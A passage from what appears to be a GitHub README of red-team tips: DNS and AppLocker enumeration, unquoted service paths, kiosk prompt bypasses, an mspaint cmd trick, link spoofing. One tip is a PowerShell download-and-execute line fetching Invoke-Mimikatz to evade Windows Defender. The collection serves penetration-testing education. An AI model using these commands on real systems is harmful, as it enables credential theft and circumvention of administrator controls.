\u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e findstr /v \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003etype\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'You'd be surprised what you can find out from a user's bookmarks alone. 
Internal endpoints they can access, for instance.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1595488676389171200\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eQuery DNS records for enumeration\u003c/h3\u003e\u003ca id=\"user-content-query-dns-records-for-enumeration\" class=\"anchor\" aria-label=\"Permalink: 🔙Query DNS records for enumeration\" href=\"#query-dns-records-for-enumeration\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Get-DnsRecord -RecordType A -ZoneName FQDN -Server \u0026lt;server hostname\u0026gt;\"\u003e\u003cpre\u003eGet-DnsRecord -RecordType A -ZoneName FQDN -Server \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eserver hostname\u003cspan 
class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1587132627823181824\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eUnquoted service paths without PowerUp\u003c/h3\u003e\u003ca id=\"user-content-unquoted-service-paths-without-powerup\" class=\"anchor\" aria-label=\"Permalink: 🔙Unquoted service paths without PowerUp\" href=\"#unquoted-service-paths-without-powerup\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative 
overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq \u0026quot;Auto\u0026quot; -and $_.PathName -notlike \u0026quot;C:\\Windows*\u0026quot; -and $_.PathName -notlike '\u0026quot;*'} | select PathName,DisplayName,Name\"\u003e\u003cpre\u003eGet-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e Where {\u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e.StartMode -eq \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eAuto\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -and \u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e.PathName -notlike \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\Windows*\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -and \u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e.PathName -notlike \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\"*\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e} \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eselect\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003ePathName,DisplayName,Name\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Finding unquoted service paths without PowerUp'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1579254955554136064\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv 
class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eBypass a disabled command prompt with /k\u003c/h3\u003e\u003ca id=\"user-content-bypass-a-disabled-command-prompt-with-k\" class=\"anchor\" aria-label=\"Permalink: 🔙Bypass a disabled command prompt with /k\" href=\"#bypass-a-disabled-command-prompt-with-k\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Win+R (To bring up Run Box)\ncmd.exe /k \u0026quot;whoami\u0026quot;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Win+R (To bring up Run Box)\u003c/span\u003e\ncmd.exe /k \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ewhoami\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'This command prompt has been disabled by your administrator...' 
Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e Martin Sohn Christensen\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://improsec.com/tech-blog/the-command-prompt-has-been-disabled-by-your-administrator-press-any-key-to-continue-or-use-these-weird-tricks-to-bypass-admins-will-hate-you\" rel=\"nofollow\"\u003eBlog\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eStop windows defender deleting mimikatz.exe\u003c/h3\u003e\u003ca id=\"user-content-stop-windows-defender-deleting-mimikatzexe\" class=\"anchor\" aria-label=\"Permalink: 🔙Stop windows defender deleting mimikatz.exe\" href=\"#stop-windows-defender-deleting-mimikatzexe\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" 
data-snippet-clipboard-copy-content=\"(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv\"\u003e\u003cpre\u003e(new-object net.webclient).downloadstring(\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ehttps://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e)\u003cspan class=\"pl-k\"\u003e|\u003c/span\u003eIEX\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003einv\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/GuhnooPlusLinux\" rel=\"nofollow\"\u003e@GuhnooPlusLinux\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/GuhnooPlusLinux/status/1605629049660809216\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eCheck if you are in a virtual machine\u003c/h3\u003e\u003ca id=\"user-content-check-if-you-are-in-a-virtual-machine\" class=\"anchor\" aria-label=\"Permalink: 🔙Check if you are in a virtual machine\" href=\"#check-if-you-are-in-a-virtual-machine\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 
1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"reg query HKLM\\SYSTEM /s | findstr /S \u0026quot;VirtualBox VBOX VMWare\u0026quot;\"\u003e\u003cpre\u003ereg query HKLM\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eYSTEM /s \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e findstr /S \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eVirtualBox VBOX VMWare\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! 
If any results show up then you are in a Virtual Machine.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/dmcxblue\" rel=\"nofollow\"\u003e@dmcxblue\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/dmcxblue/status/1366779034672136194\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eEnumerate AppLocker rules\u003c/h3\u003e\u003ca id=\"user-content-enumerate-applocker-rules\" class=\"anchor\" aria-label=\"Permalink: 🔙Enumerate AppLocker rules\" href=\"#enumerate-applocker-rules\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"(Get-AppLockerPolicy -Local).RuleCollections\n\nGet-ChildItem -Path HKLM:Software\\Policies\\Microsoft\\Windows\\SrpV2 -Recurse\n\nreg query HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\SrpV2\\Exe\\\"\u003e\u003cpre 
class=\"notranslate\"\u003e\u003ccode\u003e(Get-AppLockerPolicy -Local).RuleCollections\n\nGet-ChildItem -Path HKLM:Software\\Policies\\Microsoft\\Windows\\SrpV2 -Recurse\n\nreg query HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\SrpV2\\Exe\\\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'AppLocker can be a pain. Enumerate to see how painful'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/alh4zr3d/status/1614706476412698624\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eCMD shortcut with 6 pixels via mspaint\u003c/h3\u003e\u003ca id=\"user-content-cmd-shortcut-with-6-pixels-via-mspaint\" class=\"anchor\" aria-label=\"Permalink: 🔙CMD shortcut with 6 pixels via mspaint\" href=\"#cmd-shortcut-with-6-pixels-via-mspaint\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eOpen MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels\u003c/li\u003e\n\u003cli\u003eZoom in to make the following tasks easier\u003c/li\u003e\n\u003cli\u003eUsing the colour picker, set pixels values to (from left to right):\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e1st: R: 10, G: 0, B: 0\u003c/li\u003e\n\u003cli\u003e2nd: R: 13, G: 10, B: 13\u003c/li\u003e\n\u003cli\u003e3rd: R: 100, G: 109, B: 99\u003c/li\u003e\n\u003cli\u003e4th: R: 120, G: 101, B: 46\u003c/li\u003e\n\u003cli\u003e5th: R: 0, G: 0, B: 101\u003c/li\u003e\n\u003cli\u003e6th: R: 0, G: 0, B: 0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSave it as 24-bit Bitmap (\u003cem\u003e.bmp;\u003c/em\u003e.dib)\u003c/li\u003e\n\u003cli\u003eChange its extension from bmp to bat and run.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. 
Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://www.pentestpartners.com/\" rel=\"nofollow\"\u003ePenTestPartners\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell\" rel=\"nofollow\"\u003eBlog\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eLink spoofing with PreventDefault JavaScript method\u003c/h3\u003e\u003ca id=\"user-content-link-spoofing-with-preventdefault-javascript-method\" class=\"anchor\" aria-label=\"Permalink: 🔙Link spoofing with PreventDefault JavaScript method\" href=\"#link-spoofing-with-preventdefault-javascript-method\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" 
href=\"https://user-images.githubusercontent.com/100603074/223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-text-html-basic notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"\u0026lt;!DOCTYPE html\u0026gt;\n\u0026lt;html\u0026gt;\n \u0026lt;head\u0026gt;\n \u0026lt;meta charset=\u0026quot;UTF-8\u0026quot;\u0026gt;\n \u0026lt;title\u0026gt;PreventDefault Example\u0026lt;/title\u0026gt;\n \u0026lt;/head\u0026gt;\n \u0026lt;body\u0026gt;\n \u0026lt;a href=\u0026quot;https://google.com\u0026quot; onclick=\u0026quot;event.preventDefault(); window.location.href = 'https://bing.com';\u0026quot;\u0026gt;Go to Google\u0026lt;/a\u0026gt;\n \u0026lt;/body\u0026gt;\n\u0026lt;/html\u0026gt;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c1\"\u003e\u0026lt;!DOCTYPE html\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehtml\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehead\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003emeta\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003echarset\u003c/span\u003e=\"\u003cspan class=\"pl-s\"\u003eUTF-8\u003c/span\u003e\"\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003etitle\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003ePreventDefault Example\u003cspan 
class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003etitle\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehead\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ebody\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ea\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ehref\u003c/span\u003e=\"\u003cspan class=\"pl-s\"\u003ehttps://google.com\u003c/span\u003e\" \u003cspan class=\"pl-c1\"\u003eonclick\u003c/span\u003e=\"\u003cspan class=\"pl-s\"\u003eevent.preventDefault(); window.location.href = 'https://bing.com';\u003c/span\u003e\"\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003eGo to Google\u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ea\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n \u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ebody\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\n\u003cspan class=\"pl-kos\"\u003e\u0026lt;/\u003c/span\u003e\u003cspan class=\"pl-ent\"\u003ehtml\u003c/span\u003e\u003cspan class=\"pl-kos\"\u003e\u0026gt;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003eThreat actors have been observed using this technique to trick 